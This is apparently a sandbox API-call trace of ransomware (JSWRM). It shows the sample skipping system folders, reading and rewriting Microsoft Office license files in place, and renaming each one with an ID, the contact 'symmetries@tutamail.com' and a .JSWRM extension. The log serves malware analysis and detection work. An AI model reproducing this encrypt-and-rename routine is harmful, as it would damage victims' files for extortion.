(lpString1="ProjectProR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0108.078] lstrcmpiW (lpString1="ProjectProR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0108.078] lstrcmpiW (lpString1="ProjectProR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0108.078] lstrcmpiW (lpString1="ProjectProR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0108.078] lstrcmpiW (lpString1="ProjectProR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.078] lstrcmpiW (lpString1="ProjectProR_Trial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.078] lstrcmpiW (lpString1="ProjectProR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.078] lstrcmpiW (lpString1="ProjectProR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.078] lstrcmpiW (lpString1="ProjectProR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.078] lstrcmpiW (lpString1="ProjectProR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0108.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241010, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0108.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241100, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0108.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0108.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0108.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.080] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20973) returned 1 [0108.080] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51e0) returned 0x24c1d0 [0108.080] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51e0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51e0, lpOverlapped=0x0) returned 1 [0108.083] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.083] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51e0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51e0, lpOverlapped=0x0) returned 1 [0108.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.084] CloseHandle (hObject=0x45c) returned 1 [0108.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0108.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0108.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0108.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0108.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0108.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0108.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.084] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0108.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0108.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0108.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0108.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0108.085] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9813ffc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9813ffc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe98ac95e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d58, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Trial-ul-oob.xrm-ms", cAlternateFileName="PRFA9B~1.XRM")) returned 1 [0108.085] lstrcmpiW (lpString1="ProjectProR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.085] lstrcmpiW (lpString1="ProjectProR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.085] lstrcmpiW (lpString1="ProjectProR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.085] lstrcmpiW (lpString1="ProjectProR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.085] lstrcmpiW (lpString1="ProjectProR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.085] lstrcmpiW (lpString1="ProjectProR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.085] lstrcmpiW (lpString1="ProjectProR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.085] lstrcmpiW (lpString1="ProjectProR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.085] lstrcmpiW (lpString1="ProjectProR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.085] lstrcmpiW (lpString1="ProjectProR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0108.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0108.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0108.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0108.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0108.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Trial-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240fc0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0108.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0108.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0108.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0108.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.086] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11608) returned 1 [0108.086] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0108.086] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0108.093] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.093] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0108.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.093] CloseHandle (hObject=0x45c) returned 1 [0108.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0108.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0108.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0108.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0108.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.094] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0108.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0108.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0108.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0108.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0108.095] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe97edda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe97edda4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9886703, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ad2, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="PR948A~1.XRM")) returned 1 [0108.095] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0108.095] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0108.095] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0108.095] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0108.095] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.095] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.095] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.095] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.095] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.095] lstrcmpiW (lpString1="ProjectProVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0108.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0108.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0108.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0108.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0108.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0108.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.102] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6866) returned 1 [0108.102] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ad0) returned 0x205850 [0108.103] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ad0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1ad0, lpOverlapped=0x0) returned 1 [0108.105] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.105] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1ad0, lpOverlapped=0x0) returned 1 [0108.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0108.105] CloseHandle (hObject=0x45c) returned 1 [0108.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0108.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0108.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0108.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0108.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0108.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.106] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0108.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.107] HeapFree (in: hHeap=0x1e0000, 